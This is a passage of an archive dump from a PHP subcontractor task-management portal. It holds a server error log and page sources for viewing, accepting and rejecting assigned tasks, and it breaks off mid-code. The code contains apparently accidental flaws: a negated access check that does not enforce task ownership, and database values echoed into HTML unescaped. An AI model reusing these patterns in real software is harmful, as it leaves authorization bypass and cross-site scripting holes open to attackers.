/home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:00:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:01:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:01:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:03:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [09-Apr-2025 07:03:17 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [09-Apr-2025 07:03:35 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:10:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 07:30:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 08:12:16 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 09:35:32 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 11:46:28 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [09-Apr-2025 14:22:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 00:35:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 02:07:07 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:02:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:14:15 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 03:28:51 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 04:15:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:21:14 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:28:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:39:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:51:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 05:51:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [10-Apr-2025 05:51:36 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [10-Apr-2025 05:55:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [10-Apr-2025 05:55:18 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [10-Apr-2025 06:00:02 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 07:16:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 07:45:50 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 08:22:22 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 09:40:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 09:44:23 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 12:03:44 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 12:35:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 14:52:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [10-Apr-2025 16:27:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:03:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:16:41 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:26:31 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 01:44:24 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 02:32:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 03:12:38 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 03:23:01 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:16:13 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:21:17 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:41:26 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:51:27 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 04:51:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 04:51:39 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:12:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:12:42 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:17:08 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 05:19:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:19:23 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:22:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:22:07 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:31:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:31:27 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:32:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:32:11 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:38:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:38:06 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:38:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:38:10 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:39:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:39:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:44:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:44:40 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:44:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:44:56 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:52:33 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 05:52:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:52:55 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 05:54:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 05:54:16 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 06:00:55 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 06:05:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 06:05:52 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 06:16:12 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 07:32:43 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:23:52 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:24:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:24:14 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:33:18 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:33:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:33:28 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:36:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:36:12 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:36:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:36:50 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:37:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 128 [11-Apr-2025 08:37:25 UTC] PHP Deprecated: htmlspecialchars(): Passing null to parameter #1 ($string) of type string is deprecated in /home/emeraadmin/public_html/pages/subcontractor/report_viewsubtasksdaywise.php on line 134 [11-Apr-2025 08:39:39 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 08:39:40 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:50:34 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:51:21 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [11-Apr-2025 17:51:46 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:45:42 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:51:06 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 10:51:37 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:13:10 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:13:47 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:44:11 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 [17-Sep-2025 11:44:29 UTC] PHP Warning: Undefined array key "pending" in /home/emeraadmin/public_html/pages/subcontractor/dashboard.php on line 22 subcontractor/viewtasksassignedtome.php000064400000034573151676701240014615 0ustar00<?php include('head.php'); require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; require_once '../../Service/ServiceService.php'; $System = new System(); $serviceService = new ServiceService(); $services = $serviceService->getAllServicesForDropdown(); // Create TaskService instance $taskService = new TaskService(); $tasks = $taskService->getTasksByAssignedIdNotAccepted($companyId); ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Assigned Tasks</h5> <span>Accept or Reject tasks assigned to you</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Assigned Tasks</li> </ol> </nav> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"><h3>View Tasks</h3></div> <div class="card-body"> <div class="form-group row"> <div class="col-sm-4"> <label for="filter_service" class="col-form-label">Filter Service Name:</label> <input type="text" class="form-control" id="filter_service"> </div> <div class="col-sm-4"> <label for="filter_region" class="col-form-label">Filter Region:</label> <select class="form-control" id="filter_region"> <option value="">All Regions</option> <?php // Collect unique regions $uniqueRegions = []; foreach ($services as $service) { if (!in_array($service->region, $uniqueRegions)) { $uniqueRegions[] = $service->region; ?> <option value="<?= htmlspecialchars($service->region) ?>"><?= htmlspecialchars($service->region) ?></option> <?php } } ?> </select> </div> <div class="col-sm-3"> <!-- <label for="reset_filters" class="col-form-label">Reset Filters:</label>--> <button type="button" id="reset_filters" class="btn btn-icon btn-outline-danger"><i class="ik ik-refresh-cw"></i></button> </div> </div> <table id="super_advanced_table" class="table"> <thead> <tr> <th><input type="checkbox" id="select_all_tasks"></th> <th>ID</th> <th>Service Name</th> <th>Region</th> <th>Frequency</th> <th>Created At</th> <th>Actions</th> </tr> </thead> <tbody> <?php foreach ($tasks as $task): ?> <tr> <td><input type="checkbox" class="task_checkbox" value="<?= $task->id ?>"></td> <td><?php echo 'TSK-000' . $task->id; ?></td> <td><?php echo $task->service_name; ?></td> <td><?php echo $task->region; ?></td> <td><?php echo $task->frequency; ?></td> <td><?php echo date('F j, Y, g:i a', strtotime($task->created_at)); ?></td> <td> <a href="viewassignedtask.php?id=<?= $System->encryptData($task->id) ?>" class="btn btn-primary">View Details</a> </td> </tr> <?php endforeach; ?> </tbody> </table> <button id="accept_tasks_button" class="btn btn-success">Accept Selected Tasks</button> <button id="reject_tasks_button" class="btn btn-danger">Reject Selected Tasks</button> </div> <script> $(document).ready(function () { // Initialize DataTable var table = $('#super_advanced_table').DataTable(); // Function to save filters to localStorage function saveFilters() { var filters = { service: $('#filter_service').val(), region: $('#filter_region').val() // Add more filters as needed }; localStorage.setItem('advancedTableFilters', JSON.stringify(filters)); } // Function to apply saved filters function applyFilters() { var filters = JSON.parse(localStorage.getItem('advancedTableFilters')); if (filters) { $('#filter_service').val(filters.service).trigger('keyup'); $('#filter_region').val(filters.region).trigger('change'); // Apply more filters as needed } } // Function to reset filters function resetFilters() { $('#filter_service').val('').trigger('keyup'); $('#filter_region').val('').trigger('change'); // Remove more filters as needed localStorage.removeItem('advancedTableFilters'); table.search('').columns().search('').draw(); } // Check previous page and apply filters if necessary function checkPreviousPage() { var previousUrl = sessionStorage.getItem('previousUrl'); if (!previousUrl || !previousUrl.includes('viewassignedtask.php')) { resetFilters(); } else { applyFilters(); } } checkPreviousPage(); // Add custom filters $('#filter_service').on('keyup', function () { table.column(2).search(this.value).draw(); saveFilters(); }); $('#filter_region').on('change', function () { table.column(3).search($(this).val()).draw(); saveFilters(); }); // Add reset filters button functionality $('#reset_filters').on('click', function () { resetFilters(); }); // Handle select all tasks $('#select_all_tasks').on('click', function () { var isChecked = $(this).prop('checked'); $('.task_checkbox').prop('checked', isChecked); }); // Apply saved filters on initial load applyFilters(); // Handle accept tasks button click $('#accept_tasks_button').on('click', function () { // Confirm before accepting Swal.fire({ title: 'Are you sure?', text: 'You are about to accept the selected tasks.', icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, accept', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { handleBulkTaskAction('accepttask_bulk.php'); } }); }); // Handle reject tasks button click $('#reject_tasks_button').on('click', function () { // Confirm before rejecting Swal.fire({ title: 'Are you sure?', text: 'You are about to reject the selected tasks.', icon: 'warning', showCancelButton: true, confirmButtonText: 'Yes, reject', cancelButtonText: 'No, cancel' }).then((result) => { if (result.isConfirmed) { handleBulkTaskAction('rejecttask_bulk.php'); } }); }); function handleBulkTaskAction(url) { var selectedTasks = $('.task_checkbox:checked').map(function () { return $(this).val(); }).get(); if (selectedTasks.length > 0) { $.ajax({ url: url, method: 'POST', data: { taskIds: selectedTasks, companyId: <?= $companyId ?>}, success: function (response) { if (response === 'success') { Swal.fire({ title: 'Success', text: 'Tasks have been processed successfully.', icon: 'success', confirmButtonText: 'Ok' }).then(() => { location.reload(); }); } else { Swal.fire({ title: 'Error', text: 'An error occurred while processing tasks: ' + response, icon: 'error', confirmButtonText: 'Ok' }); } }, error: function () { Swal.fire({ title: 'Error', text: 'An error occurred while processing tasks.', icon: 'error', confirmButtonText: 'Ok' }); } }); } else { Swal.fire({ title: 'No Tasks Selected', text: 'Please select at least one task.', icon: 'warning', confirmButtonText: 'Ok' }); } } }); </script> </div> </div> </div> </div> </div> <?php include('footer.php'); ?> subcontractor/navbar.php000064400000010126151676701240011427 0ustar00<div class="modal fade apps-modal" id="appsModal" tabindex="-1" role="dialog" aria-labelledby="appsModalLabel" aria-hidden="true" data-backdrop="false"> <button type="button" class="close" data-dismiss="modal" aria-label="Close"><i class="ik ik-x-circle"></i></button> <div class="modal-dialog modal-dialog-centered" role="document"> <div class="modal-content"> <div class="quick-search"> <div class="container"> <div class="row"> <div class="col-md-4 ml-auto mr-auto"> <div class="input-wrap"> <input type="text" id="quick-search" class="form-control" placeholder="Search..." /> <i class="ik ik-search"></i> </div> </div> </div> </div> </div> <div class="modal-body d-flex align-items-center"> <div class="container"> <div class="apps-wrap"> <div class="app-item"> <a href="#"><i class="ik ik-bar-chart-2"></i><span>Dashboard</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-mail"></i><span>Message</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-users"></i><span>Accounts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-shopping-cart"></i><span>Sales</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-briefcase"></i><span>Purchase</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-server"></i><span>Menus</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-clipboard"></i><span>Pages</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-message-square"></i><span>Chats</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-map-pin"></i><span>Contacts</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-box"></i><span>Blocks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-calendar"></i><span>Events</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-bell"></i><span>Notifications</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-pie-chart"></i><span>Reports</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-layers"></i><span>Tasks</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-edit"></i><span>Blogs</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-settings"></i><span>Settings</span></a> </div> <div class="app-item"> <a href="#"><i class="ik ik-more-horizontal"></i><span>More</span></a> </div> </div> </div> </div> </div> </div> </div>subcontractor/viewassignedtask.php000064400000045052151676701240013537 0ustar00<?php include('head.php'); ?> <?php // Include database connection and TaskService class require_once '../../Classes/Database.php'; require_once '../../Service/TaskService.php'; require_once '../../Classes/System.php'; $System = new System(); $currentCompanyId = $companyId; // Create TaskService instance $taskService = new TaskService(); // Check if task ID is provided in URL if (isset($_GET['id'])) { // Fetch task details based on ID $taskId = $System->decryptData($_GET['id']); $task = $taskService->getTaskById($taskId); if(!$task->assigned_to == $currentCompanyId) { echo '<script>Swal.fire({ title: "Access Denied", text: "You do not have permission to view this task.", icon: "error", confirmButtonText: "OK" }).then(() => { window.location.href = "viewtasksassignedtome.php"; });</script>'; exit(); } } else { echo '<p>No task ID provided.</p>'; exit(); } ?> <div class="main-content"> <div class="container-fluid"> <div class="page-header"> <div class="row align-items-end"> <div class="col-lg-8"> <div class="page-header-title"> <i class="ik ik-layers bg-blue"></i> <div class="d-inline"> <h5>View Task</h5> <span>View details of a task</span> </div> </div> </div> <div class="col-lg-4"> <nav class="breadcrumb-container" aria-label="breadcrumb"> <ol class="breadcrumb"> <li class="breadcrumb-item"> <a href="../../index.html"><i class="ik ik-home"></i></a> </li> <li class="breadcrumb-item"> <a href="#">Tasks</a> </li> <li class="breadcrumb-item active" aria-current="page">View Task</li> </ol> </nav> </div> </div> </div> <!-- New row for buttons and actions --> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="card-header"> <div class="card-header-left"> <a href="javascript:history.back()" class="btn btn-outline-primary">Back</a> </div> <div class="card-header-right"> <?php if($task->is_assigned == 1 && $task->assigned_to == $currentCompanyId) { echo '<button id="acceptTask" class="btn btn-primary">Accept Task</button> <button id="rejectTask" class="btn btn-danger">Reject Task</button>'; } else{ echo '<button id="acceptTask" class="btn btn-primary">Accept Task</button>'; } ?> </div> </div> </div> </div> </div> <!-- Task viewing section --> <div class="row"> <div class="col-xl-6 col-md-6"> <div class="card "> <div class="card-body"> <div class="row align-items-center mb-30"> <div class="col-md-6"> <table> <tbody> <tr> <td><i class="ik ik-layers icon-large"></i></td> <td><h3 class="mb-0 fw-700 text-black"><?php echo $task->service_name; ?> </h3> </td> </tr> <tr> <td><i class="ik ik-map-pin icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->region; ?> </h5></td> </tr> <tr> <td><i class="ik ik-calendar icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->schedule_name; ?> </h5> </td> </tr> <tr> <td><i class="ik ik-clock icon-large"></i></td> <td><h5 class="mb-0 fw-500 text-black"><?php echo $task->frequency; ?> </h5> </td> </tr> <!-- is public or not--> <tr> <td><i class="ik ik-eye icon-large"></i></td> <td> <h2><?php echo($task->isPublic ? '<span class="badge badge-yellow">Open to accept</span>' : '<span class="badge badge-green">Task Assigned</span>'); ?></h2> </td> </tr> <?php if($task->is_assigned == 1 && $task->assigned_to == $currentCompanyId) : ?> <tr> <td><i class="ik ik-user icon-large"></i></td> <td><h6><span class="badge badge-info"> This task is assigned to your company.</span> </h6></td> </tr> <?php endif; ?> </tbody> </table> <style> table { width: 100%; border-collapse: collapse; } td { padding: 10px 15px; vertical-align: middle; } .icon-large { font-size: 24px; color: #333; } .mb-0 { margin-bottom: 0; } .fw-700 { font-weight: 700; } .fw-500 { font-weight: 500; } .text-black { color: #000; } .badge-success { background-color: #28a745; color: #fff; padding: 5px 10px; border-radius: 5px; } .badge-danger { background-color: #dc3545; color: #fff; padding: 5px 10px; border-radius: 5px; } </style> </div> <div class="col-md-6"> <?php // Assuming $task->dates is a JSON string $datesJson = $task->dates; // Decode the JSON string to an array $datesArray = json_decode($datesJson, true); // Extract the dates and format them for JavaScript $formattedDates = array_map(function ($dateEntry) { return '"' . $dateEntry['date'] . '"'; }, $datesArray); $jsDates = implode(",", $formattedDates); // Convert 